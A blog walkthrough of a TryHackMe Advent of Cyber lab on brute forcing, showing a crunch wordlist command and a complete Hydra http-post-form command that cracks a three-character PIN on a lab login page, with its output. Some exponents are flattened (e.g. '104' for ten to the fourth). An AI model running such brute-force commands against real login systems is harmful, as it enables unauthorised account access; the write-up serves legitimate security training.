THM day 3 - Advent of Cyber

included in categories Learning AoC

03 Dec 2023 03 Nov 2024 458 words 3 minutes

Contents

The third day is about brute forcing, counting PIN and password possibilities. I have to brute force a secret PIN, I use Crunch to generate a wordlist and Hydra to bruteforce a pin.

Counting PIN possibilities

There are a lot of systems that rely on PIN codes or password authentication, these systems can easily be attacked if there are no measurements taken.

Image we have a four-digit PIN, there is a total of 104 possibilities (0,1,2,3,4,5,6,7,8,9).

Counting password possibilities

Image the following scenario:

A digit 0-9
Uppercase letter A-Z
Lowercase letter a-z

Each character can be one of 62 choices. If the password would be 8 characters, we could make 628 = 218.340.105.584.896 different passwords.

The challenge

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Solution walkthrough

Upon opening the website, it shows the following interface, with the options: 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F - all the hexadecimal symbols.

Pasted image 20231214173730

There is a maximum of 3 characters to be filled in
Pasted image 20231214173836

With the wrong code, access is denied
Pasted image 20231214173856

In order to get in I need to brute force the password.

Crunch

Crunch is an amazing tool, since it takes one command to generates a wordlist with all the possibilities crunch 3 3 0123456789ABCDEF -o 3digits.txt

DuxSec@hi$ crunch 3 3 0123456789ABCDEF -o 3digits.txt Crunch will now generate the following amount of data: 16384 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 4096 crunch: 100% completed generating output

DuxSec@hi$ tail 3digits.txt FF6 FF7 FF8 FF9 FFA FFB FFC FFD FFE FFF

Great, I have all the options, the next step is to automate the ’login’ process using Hydra.

Hydra

Capturing a invalid login attempt, shows me the details of the request. It sends the post request to /login.php containing the payload pin=<my_pin>
Pasted image 20231214174456

With that information I can create the command to brute force
hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied"

DuxSec@hi$ hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied" Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 11:50:44 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task [DATA] attacking http-post-form://10.10.188.183:8000/login.php:pin=^PASS^:Access denied [8000][http-post-form] host: 10.10.188.183 password: 6F5

And Hydra found the password: 6F5.
Trying it successfully logs me in.

Pasted image 20231214175328

Takeaways

Use long passwords
Hydra is a great tool to brute force
Crunch is amazing at generating custom wordlists